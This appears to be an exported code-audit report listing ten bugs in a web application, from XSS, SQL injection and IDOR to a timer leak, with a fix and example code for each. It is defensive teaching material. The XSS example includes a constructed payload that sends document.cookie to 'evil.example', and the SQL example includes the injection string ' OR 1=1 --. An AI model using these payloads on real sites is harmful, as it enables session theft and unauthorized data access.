https://dashboard.acmecorp.io/admin
May 29, 2026 · 11:22 · 10 bugs detected
Severity Distribution (bug breakdown by severity level; chart not reproduced in this export)
Bug Report (10 of 10 shown)
Cross-site scripting (XSS): user-supplied input is rendered directly into the DOM (via `innerHTML` or React's `dangerouslySetInnerHTML`) without escaping or sanitization. An attacker can inject script that runs in other users' browsers, stealing session tokens or hijacking accounts. Render untrusted values as text (JSX's `{value}` escapes by default); where rich HTML is genuinely required, pass it through an allowlist sanitizer such as DOMPurify before rendering.
SQL injection: a raw database query is built by string concatenation with unvalidated user input. Quote characters in the input change the structure of the query, letting an attacker read, modify, or delete arbitrary rows (and, depending on the database user's privileges, more). Use parameterized queries so the SQL text is fixed and values are bound separately; validate against an allowlist anything that cannot be bound, such as column or table names.
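The escaping fix for the XSS finding, as an added example (not code from the dashboard or the audited application). The comment payload is constructed for illustration; the output is assumed to land in element text or a double-quoted attribute, not inside a script block or URL.

```javascript
// Added example (not from the original report).
// Vulnerable pattern: user input is interpolated straight into markup that is
// later assigned to innerHTML / dangerouslySetInnerHTML.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Minimal HTML escaper: neutralises the five characters that can close a text
// node or a quoted attribute value. Not sufficient for script or URL contexts.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: same template, but the untrusted value is escaped first.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Constructed stored-XSS payload of the kind a probe would submit.
const payload = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';
```

In a React tree the same protection is what `{comment}` in JSX does automatically; the finding almost always means someone reached for `dangerouslySetInnerHTML` or a raw `innerHTML` assignment instead.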
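The concatenated query beside its parameterized form, as an added example (not the application's own code). The input string is constructed; the `{ text, values }` shape follows node-postgres's `pool.query(text, values)`, and the allowlist for `ORDER BY` covers the one case a bind parameter cannot handle.

```javascript
// Added example (not from the original report). Constructed attacker input.
const userInput = "' OR 1=1 --";

// Vulnerable: the value is pasted into the SQL text, so a quote in the input
// ends the literal and the rest becomes part of the WHERE clause.
function findUserUnsafe(username) {
  return `SELECT id, email FROM users WHERE username = '${username}'`;
}

// Hardened: the SQL text is fixed; the value travels separately as a bind
// parameter and is never parsed as SQL. ($1 is node-postgres style; mysql2
// uses ? placeholders with the same text/values split.)
function findUserSafe(username) {
  return {
    text: 'SELECT id, email FROM users WHERE username = $1',
    values: [username],
  };
}

// Identifiers (column names, sort direction) cannot be bound, so they must be
// validated against a fixed allowlist rather than interpolated from input.
const SORTABLE_COLUMNS = new Set(['id', 'email', 'created_at']);
function safeOrderBy(column) {
  return SORTABLE_COLUMNS.has(column) ? column : 'id';
}
```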
The function accesses a property on an object that may be null or undefined at runtime (a `TypeError` when the upstream API returns an empty or error response), which crashes the component instead of degrading gracefully. Guard the access (optional chaining with a fallback, or an explicit check on the response shape) before using the value.
An awaited network call has no try/catch and no `.catch` on the promise, so a failed request or error status becomes an unhandled rejection. The failure is silent, and the UI is left in a broken state (spinner never clears, stale data shown). Catch the rejection and surface it through explicit error state in the component.
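One loader handling both findings (the null property access and the missing catch), as an added example rather than the application's code. `fetchImpl` is injected so the block runs offline; the fake responses and the `/api/users/:id` path are constructed for the example.

```javascript
// Added example (not from the original report).

// As reported: no try/catch, and body.profile is dereferenced unconditionally.
// An empty body ({}) throws TypeError; a network failure rejects unhandled.
async function loadProfileUnsafe(fetchImpl, userId) {
  const res = await fetchImpl(`/api/users/${userId}`);
  const body = await res.json();
  return { status: 'ok', displayName: body.profile.displayName };
}

// Hardened: every failure mode maps to an explicit result the UI can render.
async function loadProfile(fetchImpl, userId) {
  try {
    const res = await fetchImpl(`/api/users/${encodeURIComponent(userId)}`);
    if (!res.ok) {
      return { status: 'error', message: `upstream returned ${res.status}` };
    }
    const body = await res.json();
    // Optional chaining + fallback: an empty or malformed body no longer throws.
    const displayName = body?.profile?.displayName ?? 'Unknown user';
    return { status: 'ok', displayName };
  } catch (err) {
    // Network errors and invalid JSON land here instead of as unhandled rejections.
    return { status: 'error', message: err.message };
  }
}

// Constructed fake fetch covering the four paths: happy, empty body, 503, network error.
const fakeFetch = async (url) => {
  if (url.endsWith('/1')) return { ok: true, status: 200, json: async () => ({ profile: { displayName: 'Ada' } }) };
  if (url.endsWith('/2')) return { ok: true, status: 200, json: async () => ({}) };
  if (url.endsWith('/3')) return { ok: false, status: 503, json: async () => ({}) };
  throw new TypeError('Failed to fetch');
};
```

In a component, the returned `status` is what drives loading/error/ready rendering; the point is that no path can leave the promise rejected with nobody listening.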
Broken object-level authorization (IDOR): the API endpoint retrieves a document by ID without verifying that the requesting user owns or has been granted access to it, so any authenticated user can read any document by guessing or enumerating IDs. Make the ownership check part of the lookup (scope the query to the caller's identity from the server-side session) and return the same 404 for "not found" and "not yours" so IDs cannot be probed.
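The authorization check the endpoint is missing, as an added example (not the application's handler). An in-memory map stands in for the database, the sample documents and users are constructed, and `session.userId` is assumed to come from the server-side session, never from the request body or query string.

```javascript
// Added example (not from the original report). Constructed sample data.
const documents = new Map([
  ['doc-1', { ownerId: 'alice', sharedWith: ['bob'], title: 'Q2 plan' }],
  ['doc-2', { ownerId: 'carol', sharedWith: [], title: 'Payroll' }],
]);

// As reported: lookup by ID only; any authenticated caller gets any document.
function getDocumentUnsafe(session, docId) {
  const doc = documents.get(docId);
  return doc ? { status: 200, body: doc } : { status: 404 };
}

// Authorization rule lives in one place so every read path uses the same check.
function canRead(doc, userId) {
  return doc.ownerId === userId || doc.sharedWith.includes(userId);
}

// Hardened: identity comes from the session, the check is part of the lookup,
// and a forbidden document is indistinguishable from a missing one (404, not 403).
// With a real database this is the query itself: WHERE id = $1 AND owner_id = $2.
function getDocumentSafe(session, docId) {
  if (!session?.userId) return { status: 401 };
  const doc = documents.get(docId);
  if (!doc || !canRead(doc, session.userId)) return { status: 404 };
  return { status: 200, body: doc };
}
```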
The email field in the contact form is validated only on the client. Client-side checks are trivially bypassed (any HTTP client can post directly), so malformed or hostile values reach the database; if those stored addresses are later placed into outgoing mail headers, embedded CR/LF characters become a header-injection vector. Validate and normalize on the server before storing.
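A server-side check for the email field, as an added example (not the application's validator). It deliberately implements a pragmatic subset of RFC 5322 (ASCII local part, dotted ASCII domain, exactly one `@`, no quoted local parts, no internationalized domains); the regexes and the 64/254 length limits are the example's own choices, and a confirmation email remains the only real proof that an address is deliverable.

```javascript
// Added example (not from the original report).
// Local part: RFC 5322 atext characters separated by single dots.
const LOCAL_RE = /^[a-z0-9!#$%&'*+/=?^_`{|}~-]+(\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*$/i;
// Domain: two or more labels of 1-63 [a-z0-9-] chars, no leading/trailing hyphen.
const DOMAIN_RE = /^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$/;

// Returns { ok: true, value } with a normalized address, or { ok: false, reason }.
function validateEmail(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  const value = input.trim();
  if (value.length === 0 || value.length > 254) return { ok: false, reason: 'empty or too long' };
  // Whitespace and control characters (including CR/LF) are rejected outright;
  // this is what keeps a stored address from becoming a mail-header injection.
  if (/[\s\x00-\x1f\x7f]/.test(value)) return { ok: false, reason: 'whitespace or control character' };
  const parts = value.split('@');
  if (parts.length !== 2) return { ok: false, reason: 'must contain exactly one @' };
  const [local, rawDomain] = parts;
  // Domain is case-insensitive, so normalize it; the local part is preserved as given.
  const domain = rawDomain.toLowerCase();
  if (local.length < 1 || local.length > 64 || !LOCAL_RE.test(local)) return { ok: false, reason: 'invalid local part' };
  if (!DOMAIN_RE.test(domain)) return { ok: false, reason: 'invalid domain' };
  return { ok: true, value: `${local}@${domain}` };
}
```

Store `value`, not the raw input, so the database only ever holds the normalized form the validator accepted.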
The code uses `componentWillMount`, a React lifecycle method deprecated since React 16.3 (when it was renamed to `UNSAFE_componentWillMount`) and flagged for removal, so it is an upgrade risk. It also runs before the component is mounted, which is the wrong place for side effects such as subscriptions or data fetching. Derive initial state in the constructor and move side effects to `componentDidMount` (or `useEffect` in a function component).
A `setInterval` is started when the component mounts but is never cleared when it unmounts. Each mount adds another running interval, so timers and the closures they hold accumulate for the life of the page, and callbacks keep firing against components that no longer exist. Clear the interval in the effect's cleanup function (or in `componentWillUnmount`).
Multiple `console.log` statements print sensitive values (user IDs, session tokens) in production code. Session tokens are secrets, so this is a credential-exposure issue, not just an information leak: anything written to the console is readable in DevTools, captured by browser extensions and remote error-reporting tools, and often ends up in screenshots and bug reports. Never log tokens at any level, and strip debug logging from production builds.
A variable `prevData` is declared and assigned but never used in the component. It causes no runtime error and is usually dropped by the minifier, but it is dead code that misleads maintainers and typically signals an unfinished change; remove it or finish the logic it was intended for.
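The leak and its fix modelled in plain functions, as an added example (not the component's code). `mountLeaky` and `mountFixed` stand in for an effect body and the cleanup it returns; the timer registry exists only so the example can count surviving intervals without waiting for them to fire. The `unref()` call is Node-specific so the block exits cleanly when run stand-alone.

```javascript
// Added example (not from the original report).
// Registry of live intervals, so the example can measure what leaks.
const activeTimers = new Set();

function trackedSetInterval(fn, ms) {
  const handle = setInterval(fn, ms);
  if (typeof handle.unref === 'function') handle.unref(); // Node only: don't hold the process open
  activeTimers.add(handle);
  return handle;
}

function trackedClearInterval(handle) {
  clearInterval(handle);
  activeTimers.delete(handle);
}

// As reported: the interval is started on mount and nothing stops it.
// React equivalent: useEffect(() => { setInterval(tick, 1000); }, []);
function mountLeaky(tick) {
  trackedSetInterval(tick, 1000);
  return () => {}; // unmount does nothing, so the timer outlives the component
}

// Fixed: the cleanup returned from the effect clears the interval.
// React equivalent: useEffect(() => { const h = setInterval(tick, 1000); return () => clearInterval(h); }, []);
function mountFixed(tick) {
  const handle = trackedSetInterval(tick, 1000);
  return () => trackedClearInterval(handle);
}

// Mount and unmount a component n times; return how many intervals survive.
function survivingTimers(mount, n) {
  const before = activeTimers.size;
  for (let i = 0; i < n; i++) {
    const unmount = mount(() => {});
    unmount();
  }
  return activeTimers.size - before;
}
```

React's StrictMode mounts, unmounts and remounts effects once in development precisely to surface this class of bug; a component that leaks here doubles its timers on the first render.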